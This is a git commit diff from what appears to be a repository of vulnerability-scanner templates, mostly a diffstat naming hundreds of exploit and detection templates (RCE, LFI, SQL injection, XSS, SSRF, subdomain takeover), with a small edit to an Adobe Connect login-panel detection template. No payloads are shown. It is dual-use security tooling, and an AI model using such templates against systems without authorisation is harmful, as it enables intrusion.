poc/javascript/Arcms-json_newslist-sqli.yaml | 0 poc/javascript/BlueCMS_v1-adjs-sqli.yaml | 0 .../aem-querybuilder-json-servlet-187.yaml | 5 - poc/javascript/bower-json.yaml | 2 +- poc/javascript/fastjson-1-2-42-rce-7408.yaml | 9 +- poc/javascript/fastjson-1-2-47-rce.yaml | 9 +- poc/javascript/fastjson-1-2-62-rce.yaml | 17 +- poc/javascript/fastjson-1-2-67-rce-7424.yaml | 19 +- .../fastjson1_2_47-rce-Deserialization.yaml | 0 poc/javascript/js-version-jszip_3-1-3.yaml | 2 +- poc/javascript/keycloak-json-8472.yaml | 14 +- poc/javascript/package-json-9421.yaml | 9 +- poc/jenkins/jenkins-detect.yaml | 5 - poc/joomla/joomla-config-file.yaml | 6 +- poc/joomla/joomla-htaccess.yaml | 8 +- poc/kafka/kafka-consumer-monitor-8424.yaml | 2 +- poc/laravel/laravel-debug-enabled-8574.yaml | 14 +- poc/laravel/laravel-env-8583.yaml | 4 +- poc/laravel/laravel-log-file-8597.yaml | 5 +- .../Karel-ip-phone-lfi.yaml | 10 +- poc/local_file_inclusion/bems-api-lfi.yaml | 44 +- .../blue-ocean-excellence-lfi-758.yaml | 3 +- .../bullwark-momentum-lfi-808.yaml | 9 +- .../bullwark-momentum-lfi.yaml | 33 +- .../candidate-application-lfi-850.yaml | 4 - .../churchope-lfi-915.yaml | 15 +- .../dicoogle-pacs-lfi-6995.yaml | 3 + .../elfinder-version-7205.yaml | 22 +- .../generic-linux-lfi.yaml | 79 +- .../generic-windows-lfi.yaml | 10 +- .../geovision-geowebserver-lfi-7595.yaml | 8 +- .../health-check-lfi-7921.yaml | 18 +- .../hide-security-enhancer-lfi-7952.yaml | 6 +- .../huawei-hg659-lfi.yaml | 18 +- .../ibm-infoprint-lfi.yaml | 2 - poc/local_file_inclusion/jeewms-lfi.yaml | 10 +- .../jinfornet-jreport-lfi-8309.yaml | 5 - .../magicflow-lfi-8713.yaml | 5 + poc/local_file_inclusion/metinfo-lfi.yaml | 15 +- .../moodle-filter-jmol-lfi-8937.yaml | 2 +- .../oracle-fatwire-lfi.yaml | 11 +- .../pacsone-server-lfi-9430.yaml | 16 +- .../phpwiki-lfi-9567.yaml | 15 +- .../processmaker-lfi.yaml | 12 +- .../ruijie-networks-lfi-9940.yaml | 17 +- .../simple-image-manipulator-lfi-10283.yaml | 14 +- .../sl-studio-lfi-10320.yaml | 9 +- .../sofneta-mecdream-pacs-lfi-10350.yaml | 13 +- .../squirrelmail-lfi.yaml | 12 +- poc/local_file_inclusion/thinkcmf-lfi.yaml | 35 +- .../wp-javospot-lfi-11480.yaml | 4 + .../wp-socialfit-xss-11582.yaml | 4 +- .../wp-tutor-lfi-11599.yaml | 12 +- poc/local_file_inclusion/wp-vault-lfi(1).yaml | 49 +- .../xerox-efi-lfi-11681.yaml | 10 +- .../yishaadmin-lfi-11744.yaml | 14 +- poc/magento/magento-admin-panel-8693.yaml | 5 +- poc/magento/magento-cacheleak-8696.yaml | 3 +- poc/magento/magento-config.yaml | 6 +- poc/microsoft/74cms-sqli-8.yaml | 9 +- poc/microsoft/Arcms-json_newslist-sqli.yaml | 0 poc/microsoft/BlueCMS_v1-adjs-sqli.yaml | 0 poc/microsoft/IDOR-vuln-params.yaml | 32 +- poc/microsoft/JEEWMS-fileRead.yaml | 2 - poc/microsoft/aims-password-mgmt-client.yaml | 10 + poc/microsoft/aims-password-portal-222.yaml | 2 +- poc/microsoft/bems-api-lfi.yaml | 44 +- poc/microsoft/chamilo-lms-xss.yaml | 4 +- poc/microsoft/cisco-systems-login.yaml | 15 +- poc/microsoft/dedecms-openredirect.yaml | 10 +- poc/microsoft/feifeicms-lfr-7464.yaml | 2 +- poc/microsoft/grav-cms-detect-7842.yaml | 12 +- poc/microsoft/jeewms-lfi.yaml | 10 +- .../kevinlab-hems-backdoor-8467.yaml | 26 +- poc/microsoft/metatag-cms.yaml | 3 +- .../microsoft-echange-server-detect.yaml | 6 - poc/microsoft/microsoft-teams-webhook.yaml | 2 +- poc/microsoft/msmtp-config-8967.yaml | 5 - poc/microsoft/myucms-lfr-8984.yaml | 1 - poc/microsoft/octobercms-default-login.yaml | 17 +- poc/microsoft/octobercms-detect-9196.yaml | 12 +- poc/microsoft/odoo-cms-redirect.yaml | 8 +- poc/microsoft/pandora-fms-console.yaml | 3 +- poc/microsoft/rhymix-cms-detect.yaml | 8 +- poc/microsoft/samsung-wlan-ap-rce-10007.yaml | 11 +- poc/microsoft/seeddms-detect-10129.yaml | 40 +- poc/microsoft/strapi-cms-detect.yaml | 5 - poc/microsoft/vpms-auth-bypass-11069.yaml | 11 +- poc/microsoft/wems-manager-xss.yaml | 5 +- poc/microsoft/wp-arforms-listing.yaml | 3 +- poc/microsoft/wp-mstore-plugin-listing.yaml | 6 +- poc/microsoft/wp-plugin-lifterlms-11533.yaml | 47 +- poc/microsoft/wuzhicms-sqli-11658.yaml | 1 + poc/microsoft/zcms-v3-sqli.yaml | 12 +- poc/mongodb/alibaba-mongoshake-unauth.yaml | 2 +- poc/mongodb/mongodb-ops-manager-8922.yaml | 6 +- poc/mongodb/mongodb-unauth-8926.yaml | 6 +- .../rockmongo-default-credentials.yaml | 5 - poc/mongodb/rockmongo-default-login.yaml | 3 +- poc/mongodb/rockmongo-xss.yaml | 12 +- poc/netlify/netlify-takeover-9042.yaml | 11 +- poc/nginx/nginx-config.yaml | 10 +- poc/nginx/nginx-module-vts-xss-9108.yaml | 51 +- poc/nginx/nginx-proxy-manager-9111.yaml | 6 +- ...ized-puppet-node-manager-detect-10959.yaml | 44 +- poc/open_redirect/dedecms-openredirect.yaml | 10 +- .../netsweeper-open-redirect.yaml | 10 +- .../newsletter-open-redirect.yaml | 18 +- poc/open_redirect/odoo-cms-redirect.yaml | 8 +- poc/open_redirect/open-redirect-9308.yaml | 129 +- .../otobo-open-redirect-9411.yaml | 6 +- .../pieregister-open-redirect.yaml | 13 +- poc/open_redirect/pollbot-redirect-9623.yaml | 8 +- poc/open_redirect/sap-redirect-10066.yaml | 6 - .../thinkific-redirect-10732.yaml | 5 +- .../wp-grimag-open-redirect-11458.yaml | 22 +- .../wp-gtranslate-open-redirect.yaml | 3 +- .../wp-prostore-open-redirect.yaml | 10 +- .../wptouch-open-redirect-11594.yaml | 10 +- poc/oracle/Oracle-OAM-XSS.yaml | 4 - .../default-oracle-application-page-6891.yaml | 4 +- poc/oracle/oracle-dbcs-9355.yaml | 43 +- poc/oracle/oracle-ebs-xss-9375.yaml | 8 +- poc/oracle/oracle-fatwire-lfi.yaml | 11 +- .../oracle-iplanet-web-server-9393.yaml | 9 +- poc/oracle/oracle-people-enterprise-9398.yaml | 3 +- poc/oracle/oracle-siebel-xss.yaml | 20 +- poc/other/X-Remote-Addr .yaml | 2 +- poc/other/adiscon-loganalyzer-70.yaml | 52 +- poc/other/adminer-panel-75.yaml | 26 +- poc/other/ampps-admin-panel-305.yaml | 5 + poc/other/ansible-semaphore-panel-328.yaml | 30 +- poc/other/antsword-backdoor.yaml | 14 +- poc/other/apc-info.yaml | 3 + poc/other/artifactory_deploy.yaml | 29 +- poc/other/aspose-ie-file-download.yaml | 10 +- poc/other/aspose-words-file-download-572.yaml | 4 +- poc/other/axis-happyaxis-669.yaml | 9 +- poc/other/barracuda-panel-684.yaml | 4 +- poc/other/basic-cors.yaml | 40 +- poc/other/cache-poisoning.yaml | 28 +- poc/other/campaignmonitor-843.yaml | 19 +- poc/other/certificate-validation-882.yaml | 1 - poc/other/cgi-printenv-886.yaml | 5 +- poc/other/cgi-test-page.yaml | 2 - poc/other/circarlife-setup-918.yaml | 15 +- poc/other/clientaccesspolicy.yaml | 48 +- poc/other/cloudinary-1026.yaml | 5 +- poc/other/codeigniter-env.yaml | 5 +- poc/other/csod-panel-1288.yaml | 40 +- poc/other/custom-solr-file-read.yaml | 81 +- poc/other/d-link-wireless.yaml | 2 +- poc/other/deprecated-tls-6957.yaml | 27 +- poc/other/dir-listing-7009.yaml | 4 +- poc/other/domcfg-page-7075.yaml | 5 +- poc/other/easy-media-gallery-pro-listing.yaml | 48 +- poc/other/fatpipe-ipvpn-panel-7436.yaml | 3 +- poc/other/filezilla.yaml | 6 +- poc/other/firebase-urls.yaml | 2 +- poc/other/hjtcloud-arbitrary-file-read.yaml | 4 - poc/other/home-assistant-7981.yaml | 1 + poc/other/hp-service-manager-8032.yaml | 7 +- poc/other/huawei-hg532e-panel.yaml | 9 +- poc/other/internet-service.yaml | 6 +- poc/other/ioncube-loader-wizard.yaml | 13 +- poc/other/itop-panel.yaml | 6 +- poc/other/jenk.yaml | 2 +- poc/other/jkstatus-manager.yaml | 3 +- poc/other/jmx-console-8351.yaml | 4 +- poc/other/jolokia.yaml | 8 +- poc/other/landray-oa-fileread-8569.yaml | 0 poc/other/lazy-file-8607.yaml | 11 +- poc/other/liveview-axis-camera.yaml | 22 +- poc/other/local-file-inclusion.yaml | 109 +- poc/other/manageengine-adaudit-8729.yaml | 9 +- .../manageengine-adselfservice-8737.yaml | 7 +- poc/other/manageengine-analytics.yaml | 10 +- .../manageengine-assetexplorer-8757.yaml | 3 +- poc/other/manageengine-desktop-8762.yaml | 9 +- poc/other/mautic-crm-panel.yaml | 10 +- poc/other/metabase-panel.yaml | 7 +- poc/other/mikrotik-routeros.yaml | 6 +- poc/other/mobotix-guest-camera-8911.yaml | 5 +- poc/other/netscaler-gateway-9052.yaml | 13 +- poc/other/nextcloud-install-9085.yaml | 12 +- poc/other/ns-asg-file-read-9151.yaml | 32 +- poc/other/ntlm-directories-9155.yaml | 123 +- poc/other/nuuo-file-inclusion-9168.yaml | 5 +- poc/other/old-copyright.yaml | 4 + poc/other/open-mjpg-streamer.yaml | 9 +- poc/other/open-proxy-localhost.yaml | 21 +- poc/other/open-proxy-portscan.yaml | 6 +- poc/other/openam-workflow.yaml | 2 +- poc/other/otobo-panel-9412.yaml | 14 +- poc/other/panabit-panel-9445.yaml | 4 + poc/other/plesk-obsidian-9597.yaml | 7 +- poc/other/plesk-onyx.yaml | 2 +- poc/other/postmessage-tracker-9640.yaml | 50 +- poc/other/powerlogic-ion.yaml | 3 +- poc/other/printers-info-leak.yaml | 4 - poc/other/prometheus-flags-endpoint.yaml | 13 +- poc/other/proxy-checker.yaml | 31 + poc/other/psmessage.yaml | 16 +- poc/other/pulse-secure-panel-9715.yaml | 12 +- poc/other/pypicloud-panel.yaml | 11 +- poc/other/rack-mini-profiler-9788.yaml | 9 +- poc/other/rack-mini-profiler.yaml | 4 +- poc/other/request-based-interaction.yaml | 3 +- poc/other/robots-9887.yaml | 4 +- poc/other/scs-landfill-control-10098.yaml | 8 +- poc/other/securenvoy-panel-10114.yaml | 4 - poc/other/security-txt.yaml | 4 +- poc/other/shell-history.yaml | 2 +- poc/other/signatures-10269.yaml | 23936 +++++++++++++++- poc/other/sitecore-version-10292.yaml | 29 +- poc/other/sitecore-workflow-10293.yaml | 6 +- poc/other/skycaiji-admin-panel-10306.yaml | 2 +- poc/other/skycaiji-install.yaml | 5 +- poc/other/solr-query-dashboard.yaml | 14 +- poc/other/sonarqube-public-projects.yaml | 3 +- .../sonicwall-management-panel-10387.yaml | 4 +- .../spoofable-spf-records-ptr-10426.yaml | 14 +- poc/other/sugarcrm-panel-10569.yaml | 7 +- poc/other/supervpn-panel-10575.yaml | 1 + poc/other/supervpn-panel.yaml | 2 + .../symantec-messaging-gateway-10609.yaml | 8 +- poc/other/tectuus-scada-monitor.yaml | 10 +- poc/other/teradici-pcoip-10704.yaml | 7 - .../thinkcmf-arbitrary-code-execution.yaml | 4 - poc/other/tor-socks-proxy.yaml | 3 +- poc/other/tuxedo-connected-controller.yaml | 7 +- poc/other/upnp-device.yaml | 7 +- poc/other/ups-status-10984.yaml | 4 + poc/other/voipmonitor-workflow.yaml | 2 +- poc/other/wago-plc-panel.yaml | 2 +- poc/other/wazuh-panel.yaml | 7 +- poc/other/weatherlink-11115.yaml | 6 +- poc/other/workspace-one-uem-11393.yaml | 3 +- poc/other/wso2-management-console.yaml | 2 +- poc/other/xds-amr-status.yaml | 57 +- poc/other/xff-403-bypass-11685.yaml | 21 +- poc/other/xxljob-panel.yaml | 5 + poc/other/yopass-panel.yaml | 4 +- poc/other/zabbix-dashboards-access.yaml | 8 +- poc/other/zte-panel-11841.yaml | 22 +- poc/other/zuul-panel-11843.yaml | 34 +- .../nuuo-nvrmini2-upgradehandlephp-rce.yaml | 4 +- poc/php/php-fpm-status.yaml | 3 + poc/php/php-proxy-detect-9544.yaml | 11 +- poc/php/php-timeclock-xss-9553.yaml | 7 +- poc/php/phpinfo-9517.yaml | 29 +- poc/php/phpmyadmin-setup.yaml | 25 +- poc/php/phpunit.yaml | 4 - poc/php/phpwiki-lfi-9567.yaml | 15 +- poc/php/ruijie-phpinfo-9951.yaml | 20 +- poc/php/thinkphp-5023-rce-10748.yaml | 58 +- poc/php/twig-php-ssti.yaml | 3 +- poc/php/weiphp-sql-injection.yaml | 16 +- poc/php/wp-phpfreechat-xss.yaml | 5 - poc/python/autobahn-python-detect-593.yaml | 8 +- poc/python/default-django-page-6841.yaml | 4 +- poc/python/django-secret.key.yaml | 45 +- poc/python/python-metrics.yaml | 2 +- poc/rabbitmq/rabbitmq-dashboard.yaml | 2 - poc/redis/exposed-redis-7337.yaml | 4 +- .../Digital-Signage-rce.yaml | 13 +- poc/remote_code_execution/SymfonyRCE.yaml | 4 - poc/remote_code_execution/VOIPrce.yaml | 4 - .../clockwatch-enterprise-rce-1011.yaml | 5 +- .../code42-log4j-rce.yaml | 3 +- .../fastjson-1-2-42-rce-7408.yaml | 9 +- .../fastjson-1-2-47-rce.yaml | 9 +- .../fastjson-1-2-62-rce.yaml | 17 +- .../fastjson-1-2-67-rce-7424.yaml | 19 +- .../fastjson1_2_47-rce-Deserialization.yaml | 0 .../hashicorp-consul-rce-7890.yaml | 18 +- .../hashicorp-consul-rce.yaml | 12 +- .../hiboss-rce-7945.yaml | 10 +- .../icewarp-webclient-rce-8129.yaml | 7 +- .../metersphere-plugin-rce.yaml | 2 +- .../mobileiron-log4j-jndi-rce-8904.yaml | 9 +- poc/remote_code_execution/natshell-rce.yaml | 8 +- .../pdf-signer-ssti-to-rce-9472.yaml | 3 - .../phalcon-framework-source.yaml | 5 +- ...-netkang-next-generation-firewall-rce.yaml | 30 +- .../rce-cve-2021-41773.yaml | 55 +- poc/remote_code_execution/rconfig-rce.yaml | 20 +- .../salesforce-aura-9981.yaml | 4 +- .../samsung-wlan-ap-rce-10007.yaml | 11 +- .../sangfor-edr-rce-10030.yaml | 7 +- .../sar2html-rce-10082.yaml | 3 - .../showdoc-file-upload-rce-10226.yaml | 10 +- .../springboot-log4j-rce.yaml | 7 +- poc/remote_code_execution/tamronos-rce.yaml | 7 +- .../thinkcmf-rce-10727.yaml | 27 +- .../thinkphp-5023-rce-10748.yaml | 58 +- .../vmware-horizon-log4j-jndi-rce.yaml | 21 +- .../vmware-vcenter-log4j-jndi-rce.yaml | 46 +- .../wangkang-NS-ASG-rce-1.yaml | 3 - poc/remote_code_execution/webui-rce.yaml | 17 +- ...s-emails-verification-for-woocommerce.yaml | 45 +- .../wordpress-rce-simplefilelist-11302.yaml | 15 +- .../wp-xmlrpc-brute-force-11623.yaml | 5 - poc/remote_code_execution/yapi-rce-11726.yaml | 25 +- .../grails-database-admin-console-7822.yaml | 6 - poc/ruby/rails6-xss-9800.yaml | 16 +- poc/samba/samba-config-9987.yaml | 4 + poc/samba/samba-detect-9988.yaml | 10 +- poc/sap/sap-hana-xsengine-panel-10037.yaml | 2 + poc/sap/sap-netweaver-detect-10044.yaml | 6 +- poc/sap/sap-redirect-10066.yaml | 6 - .../elasticsearch-sql-client-detect.yaml | 43 +- poc/search/searchbar.yaml | 4 +- poc/sensitive/sensitive-storage-exposure.yaml | 3 +- poc/shopify/Shopify-custom-token.yaml | 5 +- poc/shopify/shopify-takeover-10204.yaml | 14 +- poc/shopify/shopify-token.yaml | 6 +- poc/smtp/esmtprc-config-7258.yaml | 13 +- poc/smtp/msmtp-config-8967.yaml | 5 - poc/social/Linkedin-id.yaml | 25 +- poc/social/facebook-secret.yaml | 4 +- poc/social/twitter-secret(1).yaml | 6 +- poc/social/wp-socialfit-xss-11582.yaml | 4 +- poc/sql/74cms-sqli-8.yaml | 9 +- poc/sql/Arcms-json_newslist-sqli.yaml | 0 poc/sql/BlueCMS_v1-adjs-sqli.yaml | 0 poc/sql/GLPI-9.3.3-SQL-Injection.yaml | 55 +- poc/sql/Maticsoft-Shop-sqli.yaml | 3 - poc/sql/api-abuseipdb.yaml | 2 +- poc/sql/couchdb-exposure-1239.yaml | 5 +- poc/sql/database-error-6771.yaml | 3 +- poc/sql/db-schema.yaml | 13 +- poc/sql/dbeaver-credentials.yaml | 16 +- poc/sql/elasticsearch-sql-client-detect.yaml | 43 +- poc/sql/exposed-adb-7280.yaml | 15 +- poc/sql/exposed-sqlite-manager-7350.yaml | 3 - .../grails-database-admin-console-7822.yaml | 6 - poc/sql/mongodb-ops-manager-8922.yaml | 6 +- poc/sql/mongodb-unauth-8926.yaml | 6 +- poc/sql/odoo-database-manager.yaml | 8 +- poc/sql/oracle-dbcs-9355.yaml | 43 +- poc/sql/sql-dump-10497.yaml | 8 +- poc/sql/sqliheader.yaml | 4 +- poc/sql/thumbs-db-disclosure-10763.yaml | 6 +- poc/sql/weiphp-sql-injection.yaml | 16 +- poc/sql/wordpress-db-repair-11254.yaml | 6 +- poc/sql/wordpress-tmm-db-migrate-11317.yaml | 2 +- poc/sql/wuzhicms-sqli-11658.yaml | 1 + poc/sql/zcms-v3-sqli.yaml | 12 +- poc/sql_injection/74cms-sqli-8.yaml | 9 +- .../Arcms-json_newslist-sqli.yaml | 0 poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml | 0 .../GLPI-9.3.3-SQL-Injection.yaml | 55 +- poc/sql_injection/Maticsoft-Shop-sqli.yaml | 3 - .../elasticsearch-sql-client-detect.yaml | 43 +- .../exposed-sqlite-manager-7350.yaml | 3 - poc/sql_injection/sql-dump-10497.yaml | 8 +- poc/sql_injection/sqliheader.yaml | 4 +- poc/sql_injection/weiphp-sql-injection.yaml | 16 +- poc/sql_injection/wuzhicms-sqli-11658.yaml | 1 + poc/sql_injection/zcms-v3-sqli.yaml | 12 +- poc/ssh/circleci-ssh-config.yaml | 2 +- poc/ssh/ssh-known-hosts.yaml | 4 - poc/ssrf/cloudflare-image-ssrf.yaml | 5 +- poc/ssrf/linkerd-ssrf-detect.yaml | 9 - poc/ssrf/microstrategy-ssrf-8861.yaml | 4 +- poc/ssrf/ssrf-via-oauth-misconfig.yaml | 3 +- poc/ssrf/vmware-vcenter-ssrf.yaml | 7 +- poc/ssrf/w3c-total-cache-ssrf-11077.yaml | 7 +- poc/ssrf/w3c-total-cache-ssrf.yaml | 4 +- poc/ssrf/xmlrpc-pingback-ssrf-11689.yaml | 18 +- poc/ssrf/zimbra-preauth-ssrf-11810.yaml | 20 +- .../acquia-takeover-35.yaml | 2 +- .../aftership-takeover.yaml | 3 +- .../agilecrm-takeover-211.yaml | 5 +- poc/subdomain_takeover/aha-takeover-214.yaml | 7 +- .../announcekit-takeover-321.yaml | 59 +- .../bitbucket-takeover-740.yaml | 6 +- .../brightcove-takeover.yaml | 5 +- .../cargo-takeover-866.yaml | 5 +- .../feedpress-takeover-7458.yaml | 5 +- poc/subdomain_takeover/flywheel-takeover.yaml | 2 + .../ghost-takeover-7622.yaml | 16 +- .../helpjuice-takeover.yaml | 5 +- .../helpscout-takeover-7934.yaml | 9 +- .../jazzhr-takeover-8235.yaml | 7 +- .../landingi-takeover-8566.yaml | 2 +- .../launchrock-takeover-8603.yaml | 5 +- .../netlify-takeover-9042.yaml | 11 +- .../pantheon-takeover-9461.yaml | 7 +- .../pingdom-takeover-9587.yaml | 8 +- .../proposify-takeover-9693.yaml | 5 +- .../readme-takeover-9842.yaml | 7 +- poc/subdomain_takeover/s3-subtakeover.yaml | 4 + .../shopify-takeover-10204.yaml | 14 +- .../tave-takeover-10661.yaml | 7 +- poc/subdomain_takeover/urge-takeover.yaml | 3 +- poc/subdomain_takeover/webflow-takeover.yaml | 7 +- .../pdf-signer-ssti-to-rce-9472.yaml | 3 - poc/template_injection/twig-php-ssti.yaml | 3 +- ...ecology_E-Office_Uploadify_FileUpload.yaml | 49 +- poc/upload/showdoc-file-upload-rce-10226.yaml | 10 +- poc/upload/zhiyuan-file-upload-11791.yaml | 15 +- poc/vmware/vmware-horizon-11038.yaml | 13 +- poc/vmware/vmware-horizon-log4j-jndi-rce.yaml | 21 +- poc/vmware/vmware-horizon-panel-11035.yaml | 3 +- poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml | 46 +- poc/vmware/vmware-vcenter-ssrf.yaml | 7 +- poc/web/axigen-webadmin.yaml | 9 +- poc/web/azkaban-web-client-676.yaml | 10 +- poc/web/cobbler-webgui-1124.yaml | 2 +- poc/web/dixell-xweb500-filewrite-7020.yaml | 18 +- .../ewebs-arbitrary-file-reading-7273.yaml | 9 +- .../fingerprinthub-web-fingerprints-7480.yaml | 253 +- poc/web/geovision-geowebserver-lfi-7595.yaml | 8 +- poc/web/icewarp-webclient-rce-8129.yaml | 7 +- poc/web/iplanet-web-server-8190.yaml | 9 +- poc/web/keenetic-web-login-8442.yaml | 6 +- poc/web/microsoft-teams-webhook.yaml | 2 +- poc/web/microweber-xss-8865.yaml | 7 +- poc/web/oracle-iplanet-web-server-9393.yaml | 9 +- poc/web/saia-web-server-info-9980.yaml | 7 +- poc/web/total-web-10816.yaml | 3 - poc/web/web-config-11126.yaml | 154 +- poc/web/webflow-takeover.yaml | 7 +- poc/web/weblogic-detect-11144.yaml | 15 +- poc/web/webmodule-ee.yaml | 3 - poc/web/webui-rce.yaml | 17 +- poc/web/xp-webcam-11699.yaml | 8 +- poc/web/zimbra-web-client-11812.yaml | 9 +- poc/web/zoho-webhook-token-11835.yaml | 2 + poc/wordpress/alfacgiapi-wordpress-257.yaml | 62 +- .../nativechurch-wp-theme-lfd-9001.yaml | 10 +- poc/wordpress/trilithic-viewpoint-login.yaml | 20 +- .../viewpoint-system-status-11016.yaml | 8 +- .../wordpress-accessible-wpconfig-11236.yaml | 2 +- poc/wordpress/wordpress-db-repair-11254.yaml | 6 +- poc/wordpress/wordpress-debug-log-11258.yaml | 4 +- ...s-emails-verification-for-woocommerce.yaml | 45 +- poc/wordpress/wordpress-git-config-11278.yaml | 11 +- poc/wordpress/wordpress-plugins-detect.yaml | 28 +- .../wordpress-rce-simplefilelist-11302.yaml | 15 +- .../wordpress-registration-enabled.yaml | 12 +- poc/wordpress/wordpress-rest-dosviacp.yaml | 9 +- .../wordpress-tmm-db-migrate-11317.yaml | 2 +- ...ordpress-total-upkeep-backup-download.yaml | 11 +- poc/wordpress/wordpress-user-enum.yaml | 4 - poc/wordpress/wordpress-user-enumeration.yaml | 2 + poc/wordpress/wordpress-weak-credentials.yaml | 7 - ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- .../wordpress-wordfence-xss-11362.yaml | 18 +- .../wordpress-zebra-form-xss-11379.yaml | 13 +- ...p-123contactform-plugin-listing-11400.yaml | 52 +- poc/wordpress/wp-adaptive-xss.yaml | 5 + poc/wordpress/wp-arforms-listing.yaml | 3 +- poc/wordpress/wp-church-admin-xss-11424.yaml | 8 +- poc/wordpress/wp-code-snippets-xss.yaml | 8 +- poc/wordpress/wp-flagem-xss.yaml | 8 +- .../wp-grimag-open-redirect-11458.yaml | 22 +- .../wp-gtranslate-open-redirect.yaml | 3 +- poc/wordpress/wp-haberadam-idor-11468.yaml | 10 +- .../wp-idx-broker-platinum-listing.yaml | 3 +- poc/wordpress/wp-javospot-lfi-11480.yaml | 4 + poc/wordpress/wp-license-file-11489.yaml | 4 - poc/wordpress/wp-license-file.yaml | 5 +- .../wp-mailchimp-log-exposure-11492.yaml | 9 +- poc/wordpress/wp-mstore-plugin-listing.yaml | 6 +- poc/wordpress/wp-nextgen-xss.yaml | 8 +- poc/wordpress/wp-phpfreechat-xss.yaml | 5 - poc/wordpress/wp-plugin-lifterlms-11533.yaml | 47 +- poc/wordpress/wp-plugin-utlimate-member.yaml | 3 +- poc/wordpress/wp-prostore-open-redirect.yaml | 10 +- poc/wordpress/wp-slideshow-xss.yaml | 4 - poc/wordpress/wp-socialfit-xss-11582.yaml | 4 +- poc/wordpress/wp-tutor-lfi-11599.yaml | 12 +- poc/wordpress/wp-vault-lfi(1).yaml | 49 +- .../wp-xmlrpc-brute-force-11623.yaml | 5 - .../wp-xmlrpc-pingback-detection-11627.yaml | 2 +- poc/wordpress/wp-xmlrpc.yaml | 4 +- poc/wordpress/wpdm-cache-session-11439.yaml | 3 + .../wptouch-open-redirect-11594.yaml | 10 +- .../springboot-actuators-jolokia-xxe.yaml | 19 +- poc/xss/DOM-XSS-SiteMinder.yaml | 5 - poc/xss/Oracle-OAM-XSS.yaml | 4 - poc/xss/accessibility-helper-xss-19.yaml | 3 +- poc/xss/basic-xss-prober-696.yaml | 6 +- poc/xss/chamilo-lms-xss.yaml | 4 +- poc/xss/coldfusion-debug-xss.yaml | 5 +- poc/xss/concrete-xss-1174.yaml | 7 +- poc/xss/discourse-xss-7013.yaml | 6 +- poc/xss/dom-xss-7080.yaml | 3 + poc/xss/dom-xss.yaml | 79 +- poc/xss/java-melody-xss-8225.yaml | 7 +- poc/xss/microweber-xss-8865.yaml | 7 +- poc/xss/mida-eframework-xss.yaml | 6 +- poc/xss/moodle-filter-jmol-xss-8944.yaml | 14 +- poc/xss/nginx-module-vts-xss-9108.yaml | 51 +- poc/xss/oracle-ebs-xss-9375.yaml | 8 +- poc/xss/oracle-siebel-xss.yaml | 20 +- poc/xss/php-timeclock-xss-9553.yaml | 7 +- poc/xss/qcubed-xss.yaml | 7 +- poc/xss/rails6-xss-9800.yaml | 16 +- poc/xss/rockmongo-xss.yaml | 12 +- poc/xss/sick-beard-xss-10234.yaml | 18 +- poc/xss/sick-beard-xss.yaml | 13 +- poc/xss/tikiwiki-reflected-xss.yaml | 5 +- poc/xss/turbocrm-xss-10851.yaml | 22 +- poc/xss/wems-manager-xss.yaml | 5 +- ...dpress-wordfence-waf-bypass-xss-11354.yaml | 5 +- poc/xss/wordpress-wordfence-xss-11362.yaml | 18 +- poc/xss/wordpress-zebra-form-xss-11379.yaml | 13 +- poc/xss/wp-adaptive-xss.yaml | 5 + poc/xss/wp-church-admin-xss-11424.yaml | 8 +- poc/xss/wp-code-snippets-xss.yaml | 8 +- poc/xss/wp-flagem-xss.yaml | 8 +- poc/xss/wp-nextgen-xss.yaml | 8 +- poc/xss/wp-phpfreechat-xss.yaml | 5 - poc/xss/wp-slideshow-xss.yaml | 4 - poc/xss/wp-socialfit-xss-11582.yaml | 4 +- poc/xss/xss-fuzz-11701.yaml | 6 +- 1114 files changed, 32351 insertions(+), 9070 deletions(-) mode change 100644 => 100755 poc/auth/zoho-webhook-token-11835.yaml mode change 100755 => 100644 poc/cve/CVE-2020-5515.yaml mode change 100755 => 100644 poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml mode change 100755 => 100644 poc/directory_listing/ecology-springframework-directoryTraversal.yaml mode change 100755 => 100644 poc/java/ecology-springframework-directoryTraversal.yaml mode change 100644 => 100755 poc/java/jboss-status-8241.yaml mode change 100755 => 100644 poc/javascript/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/javascript/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/javascript/fastjson1_2_47-rce-Deserialization.yaml mode change 100644 => 100755 poc/local_file_inclusion/wp-vault-lfi(1).yaml mode change 100755 => 100644 poc/microsoft/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/microsoft/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/other/landray-oa-fileread-8569.yaml create mode 100644 poc/other/proxy-checker.yaml mode change 100755 => 100644 poc/remote_code_execution/fastjson1_2_47-rce-Deserialization.yaml mode change 100755 => 100644 poc/sql/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/sql/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/sql_injection/Arcms-json_newslist-sqli.yaml mode change 100755 => 100644 poc/sql_injection/BlueCMS_v1-adjs-sqli.yaml mode change 100755 => 100644 poc/web/fingerprinthub-web-fingerprints-7480.yaml mode change 100644 => 100755 poc/web/zoho-webhook-token-11835.yaml mode change 100644 => 100755 poc/wordpress/wp-vault-lfi(1).yaml diff --git a/date.txt b/date.txt index 3745c09494..bd531cb555 100644 --- a/date.txt +++ b/date.txt @@ -1 +1 @@ -20240929 +20240930 diff --git a/poc.txt b/poc.txt index 1f0689d002..2e782d52bc 100644 --- a/poc.txt +++ b/poc.txt @@ -85415,6 +85415,7 @@ ./poc/other/provider-path.yaml ./poc/other/proxmox-panel.yaml ./poc/other/proxmox-ve.yaml +./poc/other/proxy-checker.yaml ./poc/other/prtg-workflow.yaml ./poc/other/prtg_network_monitor.yaml ./poc/other/prvpl.yaml diff --git a/poc/adobe/adobe-connect-central-login.yaml b/poc/adobe/adobe-connect-central-login.yaml index 1218c9f8d7..fdaf816057 100644 --- a/poc/adobe/adobe-connect-central-login.yaml +++ b/poc/adobe/adobe-connect-central-login.yaml @@ -1,10 +1,18 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk + description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel + tags: adobe,panel,connect-central + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cvss-metrics: 